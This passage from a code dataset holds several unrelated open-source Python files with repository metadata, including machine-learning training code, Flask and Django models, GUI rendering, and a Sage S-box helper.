mean_y, var_y, recon_y = vae2(y)\n adv_loss_g_y = lsgan_g(y_recon_d(recon_y))\n KLDloss_1_y = -0.5 * torch.sum(1 + var_y - mean_y.pow(2) - var_y.exp()) # KLD\n L1loss_1_y = opt.weight_alpha * F.l1_loss(y, recon_y)\n loss_2_g = adv_loss_g_y + KLDloss_1_y + L1loss_1_y\n loss_2_g.backward()\n optimizer_vae2.step()\n optimizer_vae2.zero_grad()\n # debug\n if opt.debug and current_iter%500==0:\n # [print(k, 'channel 0:\\n', v[0][0]) for k,v in list(model.named_parameters()) if k in [\"netG_A.encoder.13.conv_block.5.weight\", \"netG_A.decoder.4.conv_block.5.weight\"]]\n torchvision.utils.save_image(recon_x, 'train_vae_recon_x.png', normalize=True)\n torchvision.utils.save_image(recon_r, 'train_vae_recon_r.png', normalize=True)\n torchvision.utils.save_image(recon_y, 'train_vae_recon_y.png', normalize=True)\n \n if current_iter%500==0:\n print(f\"\"\"STEP {current_iter:06d} {time.perf_counter() - start:.1f} s\n loss_1_d = adv_loss_d_x + adv_loss_d_r + adv_loss_d_xr\n {loss_1_d:.3f} = {adv_loss_d_x:.3f} + {adv_loss_d_r:.3f} + {adv_loss_d_xr:.3f}\n loss_1_g = adv_loss_g_x + KLDloss_1_x + L1loss_1_x + adv_loss_g_r + KLDloss_1_r + L1loss_1_r + adv_loss_g_xr\n {loss_1_g:.3f} = {adv_loss_g_x:.3f} + {KLDloss_1_x:.3f} + {L1loss_1_x:.3f} + {adv_loss_g_r:.3f} + {KLDloss_1_r:.3f} + {L1loss_1_r:.3f} + {adv_loss_g_xr:.3f}\n \"\"\")\n if (current_iter+1)%2000==0:\n # finish the current_iter-th step, e.g. finish iter0, save as 1, resume train from iter 1\n state = {\n 'iter': current_iter,\n 'batch_size': opt.batch_size,\n #\n 'vae1': vae1.state_dict(),\n 'xr_recon_d': xr_recon_d.state_dict(),\n 'z_xr_d': z_xr_d.state_dict(),\n #\n 'vae2': vae2.state_dict(),\n 'y_recon_d': y_recon_d.state_dict(),\n #\n 'optimizer_vae1': optimizer_vae1.state_dict(),\n 'optimizer_d1': optimizer_d1.state_dict(),\n 'optimizer_vae2': optimizer_vae2.state_dict(),\n 'optimizer_d2': optimizer_d2.state_dict(),\n }\n torch.save(state, checkpoint_root + f'/global_checkpoint_{current_iter}.pth')\nprint(\"global\", time.perf_counter() - start, ' s')","repo_name":"jmandivarapu1/ReconImages","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21643531135","text":"from app import db\n\n\nclass RoleGrant(db.Model):\n __tablename__ = 'rolegrant'\n id = db.Column(db.Integer, primary_key=True)\n role_id = db.Column(db.Integer, db.ForeignKey('role.id'))\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n granted_user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n device_id = db.Column(db.Integer, db.ForeignKey('device.id'))\n\n def __repr__(self):\n return ''.format(\n user=self.granted_user.username,\n role=self.role.roleid,\n device=self.device.deviceid\n )\n","repo_name":"FanapSoft/FANAP-IoT-Core-Platform","sub_path":"app/model/rolegrant.py","file_name":"rolegrant.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19206853900","text":"\"\"\"เค้กช็อกโกแลต\"\"\"\r\ndef main():\r\n \"\"\"Print จำนวนเค้กที่ซื้อได้,เงินทอน\"\"\"\r\n budget = int(input())\r\n cost = int(input()) # ราคาเค้กต่อ1ชิ้น\r\n change = budget - cost\r\n if change >= 0:\r\n getcake = budget // cost\r\n print(\"Chocolate Cake: %d\" %(getcake))\r\n print(\"Money left: \"+ str(budget - (getcake * cost)))\r\n elif change < 0:\r\n print(\"Not enough money;(\")\r\n print(\"Money left: \"+ 
str(budget))\r\nmain()\r\n","repo_name":"anabxathag/onlineprepro","sub_path":"เค้กช็อก.py","file_name":"เค้กช็อก.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32643839765","text":"# Singleton/SingletonPattern.py\n\nclass OnlyOne:\n class __OnlyOne:\n def __init__(self, arg):\n self.val = arg\n def __str__(self):\n return repr(self) + self.val\n instance = None\n def __init__(self, arg):\n if not OnlyOne.instance:\n OnlyOne.instance = OnlyOne.__OnlyOne(arg)\n else:\n OnlyOne.instance.val = arg\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\t\t\nclass OnlyMe:\n pass\n\nx = OnlyMe()\n\ny = OnlyOne('eggs')\n\nz = OnlyOne('spam')\nprint('---z---')\nprint(z)\nprint('---x---')\nprint(x)\nprint('---y---')\nprint(y)\nprint('---x---')\nprint(x)\nprint('---y---')\nprint(y)\nprint('---z---')\nprint(z)\n\nprint(\"------------------------------------------------------------------\")\n\nclass Singleton2(object):\n _instance = None\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(Singleton2, cls).__new__(\n cls, *args, **kwargs)\n return cls._instance\n\n\nif __name__ == '__main__':\n s1 = Singleton2()\n s2 = Singleton2()\n print(s1)\n print(s2)\n if (id(s1) == id(s2)):\n print(\"Same\")\n else:\n print(\"Different\")\n\t\t\n\nprint(\"------------------------------------------------------------------\")\n\nclass Singleton3(object):\n def __new__(cls):\n if not hasattr(cls, 'instance'):\n cls.instance = super(Singleton3, cls).__new__(cls)\n return cls.instance\n\nsingleton = Singleton3()\nanother_singleton = Singleton3()\nprint(singleton)\nprint(another_singleton)\nprint(singleton is another_singleton)\n","repo_name":"yogeshunavane/pythontest","sub_path":"examples/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24034260562","text":"import sys\n\nimport tensorflow as tf\nimport numpy as np\nimport collections\n\n\nsys.path.insert(0, 'lib/')\nfrom architecture import architecture_base\n\nResults = collections.namedtuple('Results', ('output'))\n\nsys.path.insert(0, 'models/lib')\nimport variables\n\nclass architecture(architecture_base):\n def __init__(self):\n self.hparams = tf.contrib.training.HParams(\n decay_rate=0.9,\n decay_steps=10000.,\n learning_rate=1.e-5, # 0.001\n maximum_learning_rate = 1.e-8, # 1.e-7\n )\n\n def __test_config__(self):\n pass\n\n def build(self, input_images):\n self.__test_config__()\n #input images = [batch, height,width] BUT COMPLEX TYPE!\n its = input_images.get_shape().as_list() # [batch, features]\n input_images = tf.squeeze(tf.reshape(input_images, [its[0], its[1]*its[2], 1]), axis=2)\n print(\"input size\")\n print(its)\n layer1 = tf.layers.dense(input_images, 1024, activation=tf.nn.relu,name='0',reuse=tf.AUTO_REUSE)\n print(\"layer\")\n print(layer1.get_shape().as_list())\n layer1 = tf.layers.dense(layer1, 768, activation=tf.nn.relu,name='1',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 512, activation=tf.nn.relu,name='2',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 256, activation=tf.nn.relu,name='3',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 256, activation=tf.nn.relu,name='4',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 256, activation=tf.nn.relu,name='5',reuse=tf.AUTO_REUSE)\n layer1 = tf.layers.dense(layer1, 128, 
activation=tf.nn.relu,name='6',reuse=tf.AUTO_REUSE)\n layer1 = tf.transpose(tf.expand_dims(layer1, axis=2), [0,2,1])\n W_1 = variables.weight_variable([1, 128, 2])\n W_1 = tf.tile(W_1, [its[0], 1, 1])\n b_1 = variables.bias_variable([1])\n layer2 = tf.add(tf.matmul(layer1,W_1), b_1)\n print(\"final\")\n print(layer2.get_shape().as_list())\n layer2 = tf.reshape(layer2, [its[0], 1, 2])\n\n result = Results(layer2)\n print(\">>>>> Graph Built!\")\n\n with tf.device('/cpu:0'):\n global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False) # [] [unfinished]\n global_step = tf.add(global_step, 1)\n return result\n\n\n\n def loss_func(self, input_images, ground_truth, validation_input_images, validation_ground_truth, extra_data, validation_extra_data):\n input_images = tf.expand_dims(input_images, axis=3)\n #input_images = tf.expand_dims(extra_data[\"duplicate\"], axis=3)\n ground_truth = tf.expand_dims(ground_truth, axis=3)\n print(\">>>>>>Shape\")\n print(input_images.get_shape().as_list())\n validation_input_images = tf.expand_dims(validation_input_images, axis=3)\n #validation_input_images = tf.expand_dims(validation_extra_data[\"duplicate\"], axis=3)\n validation_ground_truth = tf.expand_dims(validation_ground_truth, axis=3)\n mini_batch_size = input_images.get_shape().as_list()[0]\n validation_mini_batch_size = validation_input_images.get_shape().as_list()[0]\n\n\n input_images = tf.squeeze(input_images, axis=3)\n ground_truth = tf.squeeze(ground_truth, axis=3)\n validation_input_images = tf.squeeze(validation_input_images, axis=3)\n validation_ground_truth = tf.squeeze(validation_ground_truth, axis=3)\n\n\n print(\">>>Start Building Architecture.\")\n res = self.build(input_images)\n print(\">>>Finished Building Architecture.\")\n output = res.output\n\n print(\">>> Run on validation set\")\n validation_res = self.build(validation_input_images)\n validation_output = validation_res.output\n print(\">>> Find MSE for the validation set\")\n v_diff = tf.subtract(tf.cast(validation_ground_truth, tf.float32), validation_output)\n v_MSE_loss = tf.norm(v_diff)\n with tf.name_scope('validation'):\n tf.summary.scalar(\"validation_total_loss\", tf.reduce_sum(v_MSE_loss))\n print(\">>>Some Maths on result\")\n print(\">>>> Find Difference\")\n difference = tf.subtract(tf.cast(ground_truth, tf.float32), tf.cast(res.output, tf.float32))\n print(\">>>> Find Norm\")\n #L2_norm = tf.norm(difference, axis=[1,2])\n #L1_norm = tf.abs(difference)\n #L2_norm = L1_norm\n\n accuracy_all = tf.abs(100.*tf.divide(tf.subtract(tf.cast(ground_truth, tf.float32), tf.cast(res.output, tf.float32)), tf.cast(ground_truth, tf.float32)))\n a_s = accuracy_all.get_shape().as_list()\n accuracy_1 = tf.squeeze(tf.squeeze(tf.slice(accuracy_all, [0,0,0], [a_s[0], a_s[1], 1]), axis=2), axis=1)\n accuracy_2 = tf.squeeze(tf.squeeze(tf.slice(accuracy_all, [0,0,1], [a_s[0], a_s[1], 1]), axis=2), axis=1)\n\n print(\">>>> Find Mean of Norm\")\n\n L2_norm = tf.norm(difference)\n batch_loss = tf.reduce_sum(L2_norm)\n difference=tf.real(difference)\n print(\">>>> Find + and - loss\")\n positive_loss = tf.reduce_sum(tf.boolean_mask(difference, tf.greater(difference, 0.)))\n negative_loss = tf.reduce_sum(tf.boolean_mask(difference, tf.less(difference, 0.)))\n\n print(\">>>> Find Mean Loss\")\n with tf.name_scope('total'):\n print(\">>>>>> Add to collection\")\n tf.add_to_collection('losses', batch_loss)\n print(\">>>>>> Creating summary\")\n tf.summary.scalar(name='batch_L2_reconstruction_cost', 
tensor=batch_loss)\n print(\">>>> Add result to collection of loss results for this tower\")\n all_losses = tf.get_collection('losses') # [] , this_tower_scope) # list of tensors returned\n total_loss = tf.add_n(all_losses) # element-wise addition of the list of tensors\n #print(total_loss.get_shape().as_list())\n tf.summary.scalar('total_loss', total_loss)\n print(\">>>> Add results to output\")\n with tf.name_scope('accuracy'):\n tf.summary.scalar('positive_loss', positive_loss)\n tf.summary.scalar('negative_loss', tf.multiply(negative_loss, -1.))\n #tf.summary.scalar('estimate_accuracy', accuracy_1)\n #tf.summary.scalar('moe_accuracy', accuracy_2)\n\n\n diagnostics = {'positive_loss':positive_loss, 'negative_loss':negative_loss, 'total_loss':total_loss, 'mse': L2_norm, 'accuracy': accuracy_1, 'moe_acc': accuracy_2}\n return output, batch_loss, diagnostics, [] #, [tf.get_variable('ConvCaps1/squash/weights')]\n","repo_name":"gavins13/aihack2018","sub_path":"nn/models/dc_cnn/architectures/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39187738028","text":"from utils import get_content_size\nimport cairo\nimport gtk\nimport pango\nimport sys\n\n# Below import must at end, otherwise will got ImportError\nfrom draw import draw_vlinear, draw_text\n\ndef render_pixbuf(widget, event, input_args):\n '''\n Render and save pixbuf.\n\n @param widget: Gtk.Widget instance.\n @param event: Expose event.\n @param input_args: Input arguments as format: (select_num, vlinear_color, text_color, filepath).\n '''\n # Init.\n (select_num, vlinear_color, text_color, filepath) = input_args\n\n cr = widget.window.cairo_create()\n rect = widget.allocation\n num_pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, rect.width, rect.height)\n\n # Draw background.\n cr.set_operator(cairo.OPERATOR_OVER)\n draw_vlinear(cr, rect.x, rect.y, rect.width, rect.height, eval(vlinear_color))\n\n # Draw text.\n draw_text(cr, select_num, rect.x, rect.y, rect.width, rect.height, text_color=text_color,\n alignment=pango.ALIGN_CENTER)\n\n # Render pixbuf from drawing area.\n num_pixbuf.get_from_drawable(\n widget.window, widget.get_colormap(), 0, 0, 0, 0,\n rect.width, rect.height).save(filepath, \"png\")\n\n # Exit after generate png file.\n gtk.main_quit()\n\nif __name__ == \"__main__\":\n # Get input arguments.\n input_args = sys.argv[1::]\n (select_num, vlinear_color, text_color, filepath) = input_args\n\n # Init.\n num_padding_x = 8\n num_padding_y = 1\n (num_width, num_height) = get_content_size(select_num)\n pixbuf_width = num_width + num_padding_x * 2\n pixbuf_height = num_height + num_padding_y * 2\n\n # Create window.\n window = gtk.Window(gtk.WINDOW_POPUP)\n window.set_colormap(gtk.gdk.Screen().get_rgba_colormap())\n window.move(-pixbuf_width, -pixbuf_height) # move out of screen\n window.set_default_size(pixbuf_width, pixbuf_height)\n window.connect(\n \"expose-event\",\n lambda w, e: render_pixbuf(w, e, input_args))\n\n window.show_all()\n\n gtk.main()\n","repo_name":"martyr-deepin/deepin-ui","sub_path":"dtk/ui/listview_preview_pixbuf.py","file_name":"listview_preview_pixbuf.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"44"} +{"seq_id":"74057933254","text":"import argparse\nimport functools\nimport glob\nimport os\nimport re\nimport string\nimport sys\nfrom pathlib import Path\nfrom typing 
import Union\nfrom urllib.parse import urlparse\n\n\nclass ArgumentError(ValueError):\n \"\"\"\n Wrapper for argument error. This exception will be raised when the arguments are invalid.\n \"\"\"\n pass\n\n\n# @functools.cache # Python 3.9+\n@functools.lru_cache(maxsize=128) # Python 3.2+\ndef alphabet_id(n):\n letters = string.ascii_uppercase\n n_letters = len(letters)\n if n < n_letters:\n return letters[n]\n _id = \"\"\n\n while n > 0:\n remainder = (n - 1) % n_letters\n _id = letters[remainder] + _id\n n = (n - 1) // n_letters\n\n return _id\n\n\ndef is_url(text):\n return urlparse(text).scheme in [\"http\", \"https\"]\n\n\ndef extract_filename_and_extension(url):\n \"\"\"\n Extract base filename and extension from the url.\n :param url: URL with filename and extension, e.g., https://example.com/images/pic.jpg?param=value\n :return: Base filename and extension, e.g., pic, jpg\n \"\"\"\n parsed_url = urlparse(url)\n path = parsed_url.path\n filename = path.split(\"/\")[-1]\n basename, *extension = filename.split(\".\")\n return basename, f\".{extension[0]}\" if extension else None\n\n\ndef build_image_paths(images):\n filenames, urls = [], []\n valid_images = [\"*.jpg\", \"*.gif\", \"*.png\", \"*.jpeg\", \"*.webp\", \"*.tif\"]\n for name in images:\n if os.path.isdir(name):\n filenames.extend([glob.glob(os.path.join(name, \"./**/\", i), recursive=True) for i in valid_images])\n elif os.path.isfile(name):\n filenames.append([name])\n elif is_url(name):\n urls.append(name)\n paths = [Path(f) for fs in filenames for f in fs] + urls\n if len(paths) == 0:\n raise FileNotFoundError(\"No valid images in the specified path.\")\n # Sort paths by (first) number extracted from the filename string\n paths.sort(key=sort_file)\n return paths\n\n\ndef sort_file(path: Union[str, Path]):\n if isinstance(path, Path):\n basename = path.stem\n else:\n basename, *_ = extract_filename_and_extension(path)\n nums = re.findall(r\"\\d+\", basename)\n return int(nums[0]) if nums else 0\n\n\ndef is_windows():\n return sys.platform in [\"win32\", \"cygwin\"]\n\n\ndef build_arguments():\n # Setup arguments\n parser = argparse.ArgumentParser(\n description=\"Skin Tone Classifier\",\n formatter_class=argparse.RawTextHelpFormatter,\n )\n parser.add_argument(\n \"-i\",\n \"--images\",\n nargs=\"+\",\n default=\"./\",\n metavar=\"IMAGE FILENAME\",\n help=\"Image filename(s) or URLs to process;\\n\"\n 'Supports multiple values separated by space, e.g., \"a.jpg b.png\";\\n'\n 'Supports directory or file name(s), e.g., \"./path/to/images/ a.jpg\";\\n'\n 'Supports URL(s), e.g., \"https://example.com/images/pic.jpg\" since v1.1.0+.\\n'\n \"The app will search all images in current directory in default.\",\n )\n parser.add_argument(\n \"-t\",\n \"--image_type\",\n default=\"auto\",\n metavar=\"IMAGE TYPE\",\n help=\"Specify whether the input image(s) is/are colored or black/white.\\n\"\n 'Valid choices are: \"auto\", \"color\" or \"bw\",\\n'\n 'Defaults to \"auto\", which will be detected automatically.',\n choices=[\"auto\", \"color\", \"bw\"],\n )\n parser.add_argument(\n \"-p\",\n \"--palette\",\n nargs=\"+\",\n metavar=\"COLOR\",\n help=\"Skin tone palette;\\n\"\n 'Supports RGB hex value leading by \"#\" or RGB values separated by comma(,),\\n'\n 'E.g., \"-p #373028 #422811\" or \"-p 255,255,255 100,100,100\"',\n )\n parser.add_argument(\n \"-l\",\n \"--labels\",\n nargs=\"+\",\n metavar=\"LABEL\",\n help=\"Skin tone labels; default values are the uppercase alphabet list leading by the image type ('C' for 'color'; 'B' for 
'Black&White'), \"\n \"e.g., ['CA', 'CB', ..., 'CZ'] or ['BA', 'BB', ..., 'BZ'].\",\n )\n parser.add_argument(\n \"-d\",\n \"--debug\",\n action=\"store_true\",\n help=\"Whether to generate report images, used for debugging and verification.\"\n \"The report images will be saved in the './debug' directory.\",\n )\n parser.add_argument(\n \"-bw\",\n \"--black_white\",\n action=\"store_true\",\n help=\"Whether to convert the input to black/white image(s).\\n\"\n \"If true, the app will use the black/white palette to classify the image.\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=\"./\",\n metavar=\"DIRECTORY\",\n help=\"The path of output file, defaults to current directory.\",\n )\n parser.add_argument(\n \"--n_workers\",\n type=int,\n help=\"The number of workers to process the images, defaults to the number of CPUs in the system.\",\n default=0,\n )\n\n parser.add_argument(\n \"--n_colors\",\n type=int,\n metavar=\"N\",\n help=\"CONFIG: the number of dominant colors to be extracted, defaults to 2.\",\n default=2,\n )\n parser.add_argument(\n \"--new_width\",\n type=int,\n metavar=\"WIDTH\",\n help=\"CONFIG: resize the images with the specified width. Negative value will be ignored, defaults to 250.\",\n default=250,\n )\n\n # For the next parameters, refer to https://stackoverflow.com/a/20805153/8860079\n parser.add_argument(\n \"--scale\",\n type=float,\n help=\"CONFIG: how much the image size is reduced at each image scale, defaults to 1.1\",\n default=1.1,\n )\n parser.add_argument(\n \"--min_nbrs\",\n type=int,\n metavar=\"NEIGHBORS\",\n help=\"CONFIG: how many neighbors each candidate rectangle should have to retain it.\\n\"\n \"Higher value results in less detections but with higher quality, defaults to 5.\",\n default=5,\n )\n parser.add_argument(\n \"--min_size\",\n type=int,\n nargs=\"+\",\n metavar=(\"WIDTH\", \"HEIGHT\"),\n help='CONFIG: minimum possible face size. 
Faces smaller than that are ignored, defaults to \"90 90\".',\n default=(90, 90),\n )\n parser.add_argument(\n \"--threshold\",\n type=float,\n metavar=\"THRESHOLD\",\n help=\"CONFIG: what percentage of the skin area is required to identify the face, defaults to 0.3.\",\n default=0.3,\n )\n\n return parser.parse_args()\n","repo_name":"ChenglongMa/SkinToneClassifier","sub_path":"src/stone/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"44"} +{"seq_id":"30838386910","text":"from django.db import models\nimport random \nimport logging\nimport sys\nimport uuid\nfrom base_rest.models import BaseModel\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nlogger = logging.getLogger(__name__)\n\n\n\n\n\nclass QuestionCategory(BaseModel):\n category_name = models.CharField(max_length=100)\n \n \n class Meta:\n verbose_name = 'QuestionCategory'\n \n \n def __str__(self):\n return self.category_name\n\n\n\nclass Question(BaseModel):\n \n question_category = models.ForeignKey(\"QuestionCategory\",related_name=\"question_category\", on_delete=models.CASCADE , null=True , blank=True)\n question_text = models.CharField(max_length=1000)\n question_type = models.IntegerField(choices = ((1 , 'MCQ') , (2 , 'SUBJECTIVE')))\n marks_per_question = models.IntegerField(default=5)\n\n \n def __str__(self):\n return self.question_text\n \n def get_question_type(self):\n if self.question_type == 1:\n return \"MCQ\"\n return \"SUBJECTIVE\"\n\n\nclass Choice(BaseModel):\n \n question = models.ForeignKey(\"Question\", related_name=\"choices\" , on_delete=models.CASCADE)\n choice = models.CharField(\"Choice\", max_length=50)\n is_correct = models.BooleanField(default=False)\n \n \n class Meta:\n unique_together = [\n (\"question\", \"choice\"), \n ]\n\n def __str__(self):\n return self.choice\n\n\nclass Quiz(BaseModel):\n\n quiz_name = models.CharField(max_length=100)\n question_category = models.ManyToManyField(QuestionCategory)\n question_limit_per_section = models.IntegerField(default=5)\n \n \n def __str__(self):\n return self.quiz_name\n\n \n\nclass QuizStatus(BaseModel):\n \n user = models.ForeignKey(User , related_name=\"user\" , on_delete=models.SET_NULL ,null =True , blank = True)\n quiz = models.ForeignKey(Quiz , related_name=\"quiz\" , on_delete=models.SET_NULL , null = True , blank =True)\n quiz_status_json = models.TextField(default=\"[]\")\n is_completed = models.BooleanField(default=False)\n \n \n def generate_random_questions(self):\n try:\n question_limit_per_section = self.quiz.question_limit_per_section\n quiz_categories = self.quiz.question_category.all()\n \n questions = []\n \n \n for quiz_category in quiz_categories:\n questions_by_category = Question.objects.filter(question_category = quiz_category )\n random_question_by_category = (list(questions_by_category))\n # shuffling to get random data\n random.shuffle(random_question_by_category)\n random_question_by_category = random_question_by_category[0:question_limit_per_section] \n for random_question in random_question_by_category:\n questions.append(random_question)\n \n return questions\n \n \n \n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n logger.error(\"generate_random_questions: %s at %s\", str(e), str(exc_tb.tb_lineno))\n\n \n \nclass QuestionAttempted(BaseModel):\n \n quiz_status = models.ForeignKey(QuizStatus , on_delete=models.CASCADE)\n question = 
models.ForeignKey(Question , on_delete=models.SET_NULL , null=True , blank=True)\n answer_answered_by_user = models.ForeignKey(Choice , on_delete=models.SET_NULL , null=True , blank=True)\n subjective_answer = models.TextField(blank=True , null=True)\n marks = models.IntegerField(default=-1)\n \n \n\n\n \n \n ","repo_name":"boxabhi/quiz_api","sub_path":"quiz/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19938466643","text":"import pandas as pd\nfrom searcher.trec_topic_searcher import TRECTopicSearcher\nfrom searcher.known_item_searcher import KnownItemSearcher\nfrom config import default as config\nfrom pyserini.search import get_topics\n\ntopics = get_topics('core17')\n \ntts = TRECTopicSearcher(path_idx=config['PATH_IDX'], \n path_bg_model=config['BM'], \n collection=config['COLLECTION'],\n topic_models_path=config['TOPIC_MODELS'],\n _lambda=config['LAMBDA'])\n\ntts_tfidf = TRECTopicSearcher(path_idx=config['PATH_IDX'], \n path_bg_model=config['BM'], \n collection=config['COLLECTION'],\n topic_models_path=config['TOPIC_MODELS'],\n _lambda=config['LAMBDA'])\n\nkis = KnownItemSearcher(path_idx=config['PATH_IDX'], \n path_bg_model=config['BM'], \n collection=config['COLLECTION'],\n topic_models_path=config['TOPIC_MODELS'],\n _lambda=config['LAMBDA'])\n\ntts_tfidf.set_term_order('tfidf')\n\ndata = []\n\nfor strategy in ['s1', 's2', 's3', 's4', 's5']:\n\n for topic in topics.keys():\n qc_tts = tts.get_query_candidates(topic=topic, strategy=strategy)\n qc_tts_tfidf = tts_tfidf.get_query_candidates(topic=topic, strategy=strategy)\n qc_kis = kis.get_query_candidates(topic=topic, strategy=strategy)\n\n for rank in range(1, 11):\n data.append({'topic': topic,\n 'strategy': strategy,\n 'rank': rank,\n 'tts': qc_tts[rank-1],\n 'tts_tfidf': qc_tts_tfidf[rank-1],\n 'kis': qc_kis[rank-1]})\n\npd.DataFrame(data).to_csv('data/queries/s12345.csv', index=False)\n","repo_name":"irgroup/ecir2022-uqv-sim","sub_path":"sim/simulate_queries_s12345.py","file_name":"simulate_queries_s12345.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"10831132705","text":"from sage.all import *\n\nfrom sage.crypto.sbox import SBox\nfrom sage.crypto import sboxes\nfrom sage.misc.cachefunc import cached_method\n\nfrom collections import Counter\n\nimport PIL\nfrom PIL import Image\n\nimport numpy as np\n\nfrom math import log2\n\nprint(version())\n\n\ndef xddt(sbox: SBox):\n if (hasattr(sbox, '_xddt')):\n return sbox._xddt\n\n nrows = 1 << sbox.input_size()\n ncols = 1 << sbox.output_size()\n\n res = [[set() for _ in range(ncols)] for _ in range(nrows)]\n res = np.zeros((nrows, ncols), dtype=object)\n for i in range(nrows):\n for j in range(nrows):\n res[i, j] = set()\n\n for x in range(nrows):\n sx = sbox[x]\n for y in range(nrows):\n sy = sbox[y]\n res[x ^ y, sx ^ sy].add(x)\n\n setattr(sbox, '_xddt', res)\n return res\n\n\ndef yddt(sbox: SBox):\n if (hasattr(sbox, '_yddt')):\n return sbox._yddt\n\n nrows = 1 << sbox.input_size()\n ncols = 1 << sbox.output_size()\n\n res = [[set() for _ in range(ncols)] for _ in range(nrows)]\n res = np.zeros((nrows, ncols), dtype=object)\n for i in range(nrows):\n for j in range(nrows):\n res[i, j] = set()\n\n for x in range(nrows):\n sx = sbox[x]\n for y in range(nrows):\n sy = sbox[y]\n res[x ^ y, sx ^ sy].add(sx)\n\n setattr(sbox, '_yddt', res)\n 
return res\n\ndef differential_spectrum(sbox: SBox):\n ddt = np.array(sbox.difference_distribution_table())\n return Counter(np.sort(ddt.ravel())[::-1])\n\n\ndef print_bitmap(bitmap: np.array, displ = lambda x : '# ' if x else ' '):\n if len(bitmap.shape) != 2:\n raise ValueError('bitmap must be 2d array')\n\n for row in range(bitmap.shape[0]):\n for col in range(bitmap.shape[1]):\n print(displ(bitmap[row, col]), end='')\n print()\n\ndef render_bitmap(bitmap: np.array):\n if len(bitmap.shape) != 2:\n raise ValueError('bitmap must be 2d array')\n\n img = Image.fromarray(bitmap)\n img.show()\n return img\n\ndef render_bitmap_log(bitmap: np.array, factor: float):\n p = bitmap / np.max(bitmap)\n imgbuf = np.zeros_like(bitmap, dtype=np.int32)\n imgbuf[p > 0] = 255 + factor * np.log2(p[p > 0])\n img = Image.fromarray(imgbuf, mode=\"L\")\n img.show()\n return img\n\n\nsboxes.DEFAULT = SBox(int(x, 16) for x in \"037ed4a9cf18b265\")\nsboxes.BAKSHEESH = SBox(int(x, 16) for x in \"306DB58ECF924A71\")\nsboxes.SPEEDY = SBox([8, 0, 9, 3, 56, 16, 41, 19, 12, 13, 4, 7, 48, 1, 32, 35,\n 26, 18, 24, 50, 62, 22, 44, 54, 28, 29, 20, 55, 52, 5,\n 36, 39, 2, 6, 11, 15, 51, 23, 33, 21, 10, 27, 14, 31, 49,\n 17, 37, 53, 34, 38, 42, 46, 58, 30, 40, 60, 43, 59, 47,\n 63, 57, 25, 45, 61])\n\n# SBox.xddt = xddt\n# SBox.yddt = yddt\n\n# SBox.ddt = lambda s : np.array(s.difference_distribution_table())\n# SBox.lat = lambda s : np.array(s.linear_approximation_table())\n# SBox.bct = lambda s : np.array(s.boomerang_connectivity_table())\n\n# SBox.differential_spectrum = differential_spectrum\n","repo_name":"fanosta/dotfiles","sub_path":"ipython/.ipython/profile_sage/startup/00-sage.py","file_name":"00-sage.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"3905579755","text":"from pickle5 import pickle\nimport inspect\nimport requests\n\n\nclass Classifier:\n \"\"\"\n Text classification using pre-trained model\n previsouly serialized using Pickle\n \"\"\"\n\n def __init__(self):\n pass\n\n def predict_category(self, offer):\n \"\"\"\n Classify job offer and generate\n relevant tags or categories\n\n :param offer: Offer object \n \"\"\"\n\n # load saved model and vectorizer\n model_path = 'application/ai/job_classification_model.pickle'\n vect_path = 'application/ai/job_classification_vect.pickle'\n\n saved_model = pickle.load(open(model_path, 'rb'))\n saved_vect = pickle.load(open(vect_path, 'rb'))\n\n # Custom categories based on specific domain knowledge\n tags = {\n 0: 'Marketing',\n 1: 'Finance',\n 2: 'Informatique',\n 3: 'Assistanat',\n 4: 'Transport',\n 5: 'Marketing',\n 6: 'Management',\n 7: 'Communication',\n 8: 'Technicien',\n 9: 'Entrepreneuriat'\n }\n\n tag_values = saved_model.transform(\n saved_vect.transform([offer.content]))\n\n # do the prediction\n dominant_tag_ids = tag_values.argmax(axis=1)\n predicted_tags = [tags[x] for x in dominant_tag_ids]\n\n return predicted_tags\n","repo_name":"samuelguebo/bara-app-python-rest-api","sub_path":"application/ai/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38115283449","text":"from typing import List, Tuple, Set, NamedTuple, Optional\n\nimport re\nimport os\nimport sys\nimport shutil\nimport 